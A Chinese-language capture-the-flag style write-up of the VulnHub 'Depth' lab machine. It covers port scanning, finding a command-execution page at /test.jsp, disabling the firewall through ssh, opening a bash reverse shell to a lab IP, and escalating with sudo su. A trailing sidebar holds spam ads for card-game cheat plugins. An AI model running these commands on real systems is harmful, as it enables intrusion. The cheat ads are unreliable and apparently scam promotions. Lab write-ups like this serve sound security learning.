【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0次
靶机安装
下载地址:https://download.vulnhub.com/depth/DepthB2R.ova
运行环境:VMware运行该虚拟机
信息收集
靶机IP发现
nmap 192.168.93.0/24
端口扫描
nmap -A 192.168.93.154 -p-
只开起了8080端口
进行目录扫描8080端口
dirsearch -u http://192.168.93.154:8080
有一个目录/test.jsp
IP网址访问
翻译过后为
后面拼接/test.jsp
翻译过后
提示我们输入 ls -l /tmp 测试一下
存在系统命令执行漏洞,进行利用,反弹shell尝试失败
漏洞利用
ls -l /home 查看到home目录内容,发现bill用户
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。
尝试关闭防火墙
#尝试关闭防火墙 ssh bill@localhost sudo ufw disable
再次执行反弹shell
ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1 
获取shell成功
提权
尝试sudo提权
sudo -l,发现所有用户(ALL)都有sudo权限,
直接 sudo su 命令
查看flag文件
相关内容
热门资讯
透视科技!广东雀神智能插件安装...
透视科技!广东雀神智能插件安装可测试,德普之星透视辅助软件是真的吗(扑克教程辅助开挂工具)您好:德普...
一分钟了解!仙神互娱辅助,赣牌...
一分钟了解!仙神互娱辅助,赣牌圈修改器,详细辅助开挂插件(有挂教学)您好:赣牌圈修改器这款游戏可以开...
透视规律!神殿娱乐控制系统,微...
透视规律!神殿娱乐控制系统,微信小程序怎么开挂(揭秘教程辅助开挂平台);无需打开直接搜索薇:1367...
最新技巧!卡农免费辅助,边锋小...
最新技巧!卡农免费辅助,边锋小程序辅助免费,原先有开挂辅助神器(有挂技巧)这是一款可以让一直输的玩家...
三分钟了解!陕麻圈修改工具,哥...
您好:哥哥打大a游戏攻略这款游戏可以开挂的,确实是有挂的,很多玩家在这款游戏中打牌都会发现很多用户的...
透明总结!广东雀神祈福真的有用...
透明总结!广东雀神祈福真的有用吗,wepokerplus透视脚本免费(必胜教程辅助开挂插件);打开点...
揭秘一下!火神工作室辅助大全,...
火神工作室辅助大全开挂教程视频分享装挂详细步骤在当今的网络游戏中,火神工作室辅助大全作为一种经典的娱...
科技新动态!酷玩联盟辅助,胡易...
科技新动态!酷玩联盟辅助,胡易决胜麻架辅助,传授辅助工具(有挂技术);无需打开直接搜索加薇13670...
透视苹果版!广东雀神透视,微信...
>>您好:微信小程序微乐陕西挖坑确实是有挂的,很多玩家在这款微信小程序微乐陕西挖坑游戏中打牌都会发现...
科普常识!多乐手游辅助,桂林字...
科普常识!多乐手游辅助,桂林字牌辅助,原本有开挂辅助平台(有挂详细);无需打开直接搜索打开薇:136...